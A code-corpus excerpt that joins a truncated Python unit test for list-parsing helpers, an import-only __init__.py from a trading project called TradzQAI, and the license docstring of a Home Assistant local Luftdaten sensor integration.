parse_util.parse_list(value, separator=',') self.assertEqual(f('[a,b,c]'), ['[a', 'b', 'c]']) def test_parse_list_with_invalid_json_without_separator(self): f = lambda value: parse_util.parse_list(value, separator=None) self.assertEqual(f('[a,b,c]'), None) def test_parse_phonenumber(self): # TODO pass def test_parse_slug(self): # TODO pass def test_parse_str(self): # TODO pass def test_parse_uuid(self): # TODO pass
TradzQAI/core/__init__.py
kkuette/AI_project
164
12749446
from .environnement import Local_env from .environnement import Live_env from .worker import Local_Worker from .worker import Live_Worker from .session import Local_session from .session import Live_session
custom_components/local_luftdaten/__init__.py
Aulos/local_luftdaten
163
12749452
""" Support for local Luftdaten sensors. Copyright (c) 2019 <NAME> Licensed under MIT. All rights reserved. https://github.com/lichtteil/local_luftdaten/ """